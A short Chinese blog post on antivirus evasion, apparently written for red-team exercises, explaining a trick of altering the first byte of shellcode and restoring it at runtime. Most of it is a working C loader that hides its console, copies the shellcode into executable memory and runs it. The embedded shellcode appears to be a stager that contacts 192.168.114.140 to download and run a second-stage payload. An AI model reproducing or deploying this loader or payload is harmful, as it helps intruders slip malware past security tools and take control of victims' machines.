免杀tips

2021-04-15 10:28:53 浏览数 (1)

最近断更了,是什么让我们饱经风霜,无奈断更,是xx,师傅们都去各地就位了,文章也就少了起来,今天分享个小技巧。

该方法仅为抛砖引玉,毕竟老方法,作用不大。

原理,更改shellcode前几位,然后加载时重置。

直接上代码:

代码语言:javascript复制
#include "windows.h"

int main(int argc,char * argv[]) {
  
  ::ShowWindow(::GetConsoleWindow(),SW_HIDE);

  unsigned char shellcode[]=  "xfexe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30"
    "x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
    "xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52"
    "x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1"
    "x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b"
    "x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03"
    "x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b"
    "x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24"
    "x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb"
    "x8dx5dx68x6ex65x74x00x68x77x69x6ex69x54x68x4c"
    "x77x26x07xffxd5x31xdbx53x53x53x53x53x68x3ax56"
    "x79xa7xffxd5x53x53x6ax03x53x53x68xb3x15x00x00"
    "xe8x6ax01x00x00x2fx57x65x56x69x48x48x4ex41x6f"
    "x4fx51x36x76x54x75x38x59x37x52x73x4dx41x38x68"
    "x72x6ax33x30x67x39x42x41x6cx42x35x66x45x68x33"
    "x66x2dx65x68x69x6ex46x42x33x45x4dx59x59x79x7a"
    "x46x34x53x34x6cx50x74x4fx57x6ax4ex63x46x6bx6f"
    "x73x47x6ex70x53x50x53x6ex33x64x73x53x7ax6ex2d"
    "x41x2dx50x56x39x74x2dx6fx58x4fx56x45x30x47x55"
    "x61x63x34x61x41x68x42x53x67x57x58x69x6cx71x52"
    "x33x6bx6bx59x59x56x63x42x4dx37x75x79x4fx70x38"
    "x45x5fx4dx70x44x30x35x39x4bx4bx6bx4bx49x6cx6a"
    "x48x51x50x2dx4dx32x75x64x4ex58x47x63x51x35x5a"
    "x4bx49x41x42x43x59x6fx55x72x53x77x34x4ex59x35"
    "x48x46x41x49x78x63x63x41x69x73x6cx43x4cx44x76"
    "x57x5fx77x64x32x67x39x68x4dx51x54x31x39x50x50"
    "x50x53x41x41x4fx51x55x6bx68x4ex63x56x46x7ax2d"
    "x4cx4ax47x38x52x58x38x61x6fx4cx6bx2dx4bx34x77"
    "x46x48x72x00x50x68x57x89x9fxc6xffxd5x89xc6x53"
    "x68x00x02x60x84x53x53x53x57x53x56x68xebx55x2e"
    "x3bxffxd5x96x6ax0ax5fx53x53x53x53x56x68x2dx06"
    "x18x7bxffxd5x85xc0x75x14x68x88x13x00x00x68x44"
    "xf0x35xe0xffxd5x4fx75xe1xe8x4cx00x00x00x6ax40"
    "x68x00x10x00x00x68x00x00x40x00x53x68x58xa4x53"
    "xe5xffxd5x93x53x53x89xe7x57x68x00x20x00x00x53"
    "x56x68x12x96x89xe2xffxd5x85xc0x74xcfx8bx07x01"
    "xc3x85xc0x75xe5x58xc3x5fxe8x7fxffxffxffx31x39"
    "x32x2ex31x36x38x2ex31x31x34x2ex31x34x30x00xbb"
    "xf0xb5xa2x56x6ax00x53xffxd5";

  char fisrt[] = "xfc";
  void *exec = VirtualAlloc(0,sizeof shellcode,MEM_COMMIT,PAGE_EXECUTE_READWRITE);

  memcpy(shellcode,fisrt,1);
  memcpy(exec, shellcode, sizeof shellcode);

  ((void(*)())exec)();

  return 0;
}

微步在线查杀结果地址:

https://s.threatbook.cn/report/file/4c806570e9b97eeb98e435ca5a8cb260186af96abebeb216c8ecb9c3faa6597a/?sign=history&env=win7_sp1_enx86_office2013

最后祝各位师傅,hw顺利。

0 人点赞